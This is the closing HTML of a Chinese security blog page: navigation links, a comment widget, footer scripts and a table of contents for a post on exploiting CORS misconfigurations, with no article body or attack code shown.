                </ul>
            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                               rel="prev"
                               href="/2022/01/29/PortSwigger-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"
                            >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                                <span class="title flex-center">
                                <span class="post-nav-title-item">PortSwigger-文件上传</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                               rel="next"
                               href="/2021/12/10/PortSwigger-CSRF%E6%94%BB%E5%87%BB/"
                            >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">CSRF攻击</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                                <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                            </a>
                        </div>
                    
                </div>
            

            
                <div class="comment-container">
                    
<div class="comments-container">
    <div id="comments-anchor"></div>
    <div class="comment-area-title">
        <i class="fas fa-comments"></i>&nbsp;评论
    </div>
    
        
            

    <div class="valine-container">
        <script data-pjax src="//cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script>
        <div id="vcomments"></div>
        <script data-pjax>
          function loadValine() {

            const config = {
              el: '#vcomments',
              appId: 'mCIu9X4iLP3I0GikUoetB9bV-9Nh9j0Va',
              appKey: 'ermlV1eoB1YODT088EdXjo6C',
              meta: ['nick', 'mail', 'link'],
              avatar: 'wavatar',
              enableQQ: true,
              placeholder: 'just go go',
              lang: 'zh-CN'.toLowerCase()
            }

            if ('') {
              config.serverURLs = ''
            }

            new Valine(config)

            function getAuthor(language) {
              switch (language) {
                case 'en':
                  return 'Author'
                case 'zh-CN':
                  return '博主'
                default:
                  return 'Master'
              }
            }

            // Add "Author" identify
            const getValineDomTimer = setInterval(() => {
              const vcards = document.querySelectorAll('#vcomments .vcards .vcard')
              if (vcards.length > 0) {
                let author = 'Drunkbaby'

                if (author) {
                  for (let vcard of vcards) {
                    const vnick_dom = vcard.querySelector('.vhead .vnick')
                    const vnick = vnick_dom.innerHTML
                    if (vnick === author) {
                      vnick_dom.innerHTML = `${vnick} <span class="author">${getAuthor(KEEP.hexo_config.language)}</span>`
                    }
                  }
                }
                clearInterval(getValineDomTimer)
              } else {
                clearInterval(getValineDomTimer)
              }
            }, 2000)
          }

          if ('true' === 'true') {
            const loadValineTimeout = setTimeout(() => {
              loadValine()
              clearTimeout(loadValineTimeout)
            }, 1000)
          } else {
            window.addEventListener('DOMContentLoaded', loadValine)
          }
        </script>
    </div>



        
    
</div>

                </div>
            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%88%A9%E7%94%A8CORS%E8%BF%9B%E8%A1%8C%E6%94%BB%E5%87%BB"><span class="nav-text">利用CORS进行攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-%E4%BB%80%E4%B9%88%E6%98%AFCORS%E4%BB%A5%E5%8F%8ACORS%E9%97%AE%E9%A2%98%E5%87%BA%E7%8E%B0%E7%9A%84%E8%B5%B7%E5%9B%A0"><span class="nav-text">0x01 什么是CORS以及CORS问题出现的起因</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-SOP-Same-origin-policy-%E7%9A%84%E5%87%BA%E7%8E%B0"><span class="nav-text">1.SOP(Same-origin policy)的出现</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-1-%E4%B8%BA%E4%BB%80%E4%B9%88%E9%9C%80%E8%A6%81%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5"><span class="nav-text">1.1 为什么需要同源策略</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#1-2-%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5"><span class="nav-text">1.2 如何实现同源策略</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#1-3-%E6%94%BE%E5%AE%BD%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5%E2%80%94%E2%80%94-CORS%E7%9A%84%E5%89%8D%E4%B8%96%E4%BB%8A%E7%94%9F"><span class="nav-text">1.3 放宽同源策略——-CORS的前世今生</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-CORS%E4%BB%A5%E5%8F%8AAccess-Control-Allow-Origin-ACAO-%E5%93%8D%E5%BA%94%E5%A4%B4"><span class="nav-text">2.CORS以及Access-Control-Allow-Origin(ACAO)响应头</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#2-1-%E4%BB%80%E4%B9%88%E6%98%AFACAO%E5%93%8D%E5%BA%94%E5%A4%B4"><span class="nav-text">2.1 什么是ACAO响应头?</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-2CORS%E7%9A%84%E7%AE%80%E5%8D%95%E5%AE%9E%E7%8E%B0"><span class="nav-text">2.2CORS的简单实现</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-3-%E4%BD%BF%E7%94%A8ACAO%E5%87%AD%E8%AF%81%E5%A4%84%E7%90%86CORS"><span class="nav-text">2.3 使用ACAO凭证处理CORS</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-4-%E4%BD%BF%E7%94%A8%E9%80%9A%E9%85%8D%E7%AC%A6%E6%94%BE%E5%AE%BDCORS%E8%A7%84%E8%8C%83"><span class="nav-text">2.4 使用通配符放宽CORS规范</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-5-%E5%9C%A8%E8%8E%B7%E5%8F%96%E8%B5%84%E6%BA%90%E5%89%8D%E4%BD%BF%E7%94%A8Options%E8%AF%B7%E6%B1%82%E8%BF%9B%E8%A1%8C%E6%A3%80%E6%9F%A5"><span class="nav-text">2.5 在获取资源前使用Options请求进行检查</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-%E8%BF%9B%E5%85%A5%E6%AD%A3%E9%A2%98%EF%BC%8C%E5%88%A9%E7%94%A8CORS%E8%BF%9B%E8%A1%8C%E6%94%BB%E5%87%BB"><span class="nav-text">0x02 进入正题，利用CORS进行攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-CORS%E9%85%8D%E7%BD%AE%E5%87%BA%E7%8E%B0%E7%9A%84%E6%BC%8F%E6%B4%9E"><span class="nav-text">1.CORS配置出现的漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-1%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E7%94%9F%E6%88%90-%E6%9D%A5%E8%87%AA%E5%AE%A2%E6%88%B7%E7%AB%AF%E6%8C%87%E5%AE%9A%E7%9A%84Origin%E5%A4%B4%E7%9A%84ACAO%E5%A4%B4"><span class="nav-text">1.1服务器端生成,来自客户端指定的Origin头的ACAO头</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#1-2%E5%88%A9%E7%94%A8%E8%A7%A3%E6%9E%90Origin%E6%A0%87%E5%A4%B4%E6%97%B6%E7%9A%84%E6%94%BB%E5%87%BB"><span class="nav-text">1.2利用解析Origin标头时的攻击</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#1-3%E8%A2%AB%E8%AE%A4%E4%B8%BA%E6%98%AF%E7%99%BD%E5%90%8D%E5%8D%95%E7%9A%84Origin%E5%80%BC%E4%B8%BANull"><span class="nav-text">1.3被认为是白名单的Origin值为Null</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E5%88%A9%E7%94%A8CORS%E6%89%A7%E8%A1%8C%E7%9A%84%E6%94%BB%E5%87%BB"><span class="nav-text">2.利用CORS执行的攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#2-1%E5%88%A9%E7%94%A8CORS%E6%89%A7%E8%A1%8CXSS"><span class="nav-text">2.1利用CORS执行XSS</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-2%E7%94%B1%E4%BA%8ECORS%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%BD%93%E5%BC%95%E8%B5%B7TLS%E7%9A%84%E4%B8%AD%E6%96%AD"><span class="nav-text">2.2由于CORS配置不当引起TLS的中断</span></a></li></ol></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            
<footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
                <span>2021</span> -
            
            2023
            
                &nbsp;<i class="fas fa-heart icon-animate"></i>
                &nbsp;<a href="/">Drunkbaby</a>
            
        </div>
        
            <script async data-pjax
                    src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    访问人数&nbsp;<span id="busuanzi_value_site_uv"></span>&ensp;
                
                
                    总访问量&nbsp;<span id="busuanzi_value_site_pv"></span>
                
            </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动&nbsp;|&nbsp;主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.6.1</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="tools-item flex-center go-to-comments">
                <i class="fas fa-comment"></i>
                <span class="post-comments-count"></span>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/dark-light-toggle.js"></script>




    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/local-search.js"></script>



    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/code-block.js"></script>




<div class="post-scripts pjax">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/post-helper.js"></script>
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/libs/anime.min.js"></script>
        
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/toc.js"></script>
        
    
</div>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            KEEP.refresh();
        });
    });
</script>



</body>
</html>
